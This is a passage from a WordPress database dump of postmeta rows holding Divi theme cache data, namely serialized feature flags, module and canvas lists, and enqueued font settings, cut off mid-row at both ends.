\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32511,1594,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32512,1319,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32503,1434,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32504,1434,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32505,1434,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32506,1434,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32507,1594,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32508,1319,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32509,1319,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32510,1594,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32502,1452,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32498,1326,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32499,1452,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32500,1452,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32501,1452,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32495,1326,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32496,1326,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32497,1326,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32491,1064,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32492,1064,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32493,1064,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32494,1064,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32487,1152,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32488,1152,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32489,1152,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32490,1152,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32483,1644,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32484,1644,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32485,1644,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32486,1644,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32474,697,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32475,1066,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32476,1066,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32477,1066,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32478,1066,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32479,1061,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32480,1061,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32481,1061,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32482,1061,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32470,952,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32471,697,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32472,697,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32473,697,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32462,769,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32463,701,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32464,701,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32465,701,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32466,701,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32467,952,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32468,952,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32469,952,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32458,962,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1